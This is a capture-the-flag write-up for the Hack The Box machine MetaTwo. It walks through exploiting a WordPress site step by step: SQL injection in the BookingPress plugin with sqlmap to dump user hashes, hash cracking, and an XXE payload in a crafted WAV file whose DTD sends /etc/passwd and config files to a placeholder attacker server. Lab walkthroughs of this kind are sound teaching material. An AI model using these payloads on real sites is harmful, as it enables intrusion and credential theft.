HackTheBox

Writeups for the Hack The Box machines

View on GitHub

https://app.hackthebox.com/machines/MetaTwo

image

Enumeration

Port scan :

Starting with a quick Rustscan :

sudo rustscan -a 10.10.11.186 -- -A -T4 -vv

Found 3 open ports :

- 21 FTP
- 22 SSH
- 80 HTTP

image

image

Found a domain to resolve in the HTTP scan result, i.e. http://metapress.htb image

Added the domian to the host file in /etc/hosts & browsed on that website, found a regular page created with wordpress. image

Tried some Anonymous FTP logon but no luck 😕 :

image

As detected earlier the website is running on wordpress hence used a wordpress scanner using “wpscan”

image

Since, I have used an api token (which we can get after registering in the website of wpscan) got 28 vulnerabilities :

image image image

At this time got the idea that the website is vunerable to wordpress. Also, from the sub-domain enumeration I observed that the ‘/events’ page is running some kind of plugin called “booking press” on version 1.0.10, however this plugin wasn’t detected in our WPScan.

image

Initial foothold:

As checked for the exploit for this plugin & version found this content which describes an un-authicated SQLi, ref : https://wpscan.com/vulnerability/388cd42d-b61a-42a4-8604-99b812db2357

image

As per thier POC, we can utilise the “_wpnonce”, and this value can be extracted from the source code of the “/events” page : image

image

Now as the plugin has a SQLi vulnerability which we can utilise with the SQL map tool for which we need to save a post request from Burp. We can utilise the POC code with just some minor modification to change the “_wpnonce” value & send the curl request through Burp using “-x” parameter.

image

We have captured the request in Burp :

image

Now, we have to save the Burp request but before doing that we have to replace injecteion parameter from the query to any number, or we can leave that parameter empty, this is to make sure that SQL map will work properly.

Final query will somewhat look like this :

    POST /wp-admin/admin-ajax.php HTTP/1.1
    Host: metapress.htb
    User-Agent: curl/7.85.0
    Accept: */*
    Content-Length: 185
    Content-Type: application/x-www-form-urlencoded
    Connection: close
    
    action=bookingpress_front_get_category_services&_wpnonce=ffcd6fe38a&category_id=33&total_service=1

We save the above content in any file such as ‘admin-ajax.req’ & then we will pass it into the SQL map & then we can use the below query to dump the database.

    sqlmap -r admin.req -p total_service --dbs
    
    - The -r flag tells sqlmap to read the request from the specified file.
    - The -p flag tells sqlmap to test only the specified parameter in our case "total_service" is the vulnuerable paramter.
    - The --dbs flag tells sqlmap to dump all the databases.

After the completion of the scan we can see that the backend DB is running with the MySQL & there are 2 DB that is avilable :

    - Blog
    - Information_schema

image

Now, let’s dump the blog database first using SQL map & we can do this via this query :

    sqlmap -r admin.req -p total_service -D blog --tables

Got this result :

image

And similarly we can dump the ‘information_schema’ table using SQL map. Got this log list of tables :

image

As we have dumped both the DB we can search for some sensitive data & in the blog table we have “wp_users” table which we can dump using SQL map & for dumping we will user this query :

    sqlmap -r admin.req -p total_service -D blog -T wp_users --dump

Hash cracking:

Got 2 users hash & id in that table, they are ‘admin’ & ‘manager’ :

image

Checked the hash in haiti & found that we can crack with HashCat using the mode 400, followd the same in my carcking machine & few seconds got the plain text password of the manager. Also, tried to crack the admin hash but failed to do so, seems like it’s a salted hash.

image image

Now, with the gathered credential tried to logon via FTP but no luck. 😕

image

Then I went to the wordpress logon website which I found in subdomain enumeration, i.e. : “/wp-login” & logged in using the manager credentials.

image image

In the website found an upload section which is running on php, so tried to upload some php reverse shell but it’s blocking from upload due to security restrictions.

image

We have the manager account access & we can also upload some certain files, but how can we exploit? After searching for hours I again checked for my WPscan results & found this existing vulnerability, which is matching with my current situation :

image image

Wordpress exploitation:

Also, found a room in THM with detailed explanation & exploit for the vulnerability, ref : https://tryhackme.com/room/wordpresscve202129447 Followed the steps for the exploit with creating the first file: payload.wav, which contains this payload :

    RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://YOURSEVERIP:PORT/NAMEEVIL.dtd'"'"'>%remote;%init;%trick;]>\x00

And the 2nd file ‘NAMEEVIL.dtd’ will contain this data,which will read the ‘/etc/passwd’ content of the machine :

    <!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd">
    <!ENTITY % init "<!ENTITY &#x25; trick SYSTEM 'http://YOURSERVERIP:PORT/?p=%file;'>" >

Now launch an http server in the same directory as the dtd file.

    php -S 0.0.0.0:PORT

Now upload the malicious .wav to the WordPress application! And, quickly after uploading the file we got the response in our terminal in b64 format :

image

Decoded the string & found the /etc/passwd content, which contains a user ‘jnelson’:

image

Now, lets search for WordPress wp-config.php file, but for that we need the path for that directory. From the htm source code we already observedthat it’s running nginx let’s check the nginx configuration first, to do that we can just change the location in our .dtd file from /etc/passwd to ‘/etc/nginx/sites-enabled/default’.

Edited & request with payload & qquickly got the response in b64 format, decoded & observed a location which might running ‘wp-config.php’ file:

image

The location observed from the nginx config file is : ‘/var/www/metapress.htb/blog’, let’s use this location in our payload request to check for the configuration file.

Edited & requested the paramter & got this response, which contains multiple sensitive information along with the FTP username & password :

image

Using the gathered credentials I am able to login into FTP where I found two directories, blog & mailer:

image

Mailer directory conrtains some php script ‘send_email.php’, downloaded the script into the kali machine. Checked the script content & found the jnelson credentials in it :

image

User flag :

Using gathered credentials trying to log in via ssh & successfully logged in this time. (pwned!🙂)

image

Root access:

As visible in the user folder found there is a folder called ‘passpie’ which contains root user ssh keys but seems like it’s in gpg encrypted form:

image

Did some searching on google & found ‘passpie’ is a CLI password manager written in python. Also, there is another file in ‘passpie’ folder name ‘keys’ which seems like holding keys for decrypting the password. Let’s copy the file into our kali machine.

‘keys’ file contains 2 block publick & private, I only copied the private block & created a file in my kali box.

image

Converted the ‘keys’ gpg file into ‘john the ripper’ format to crack it:

image

Using JTR easily cracked the password :

image

Now, we have the password we can just export the password into any of our own created file:

    passpie list
    touch passwords
    passpie export passwords

image

And got the root password as well, now we can switch into root user & collect the root flag. (pwned!🙂)

image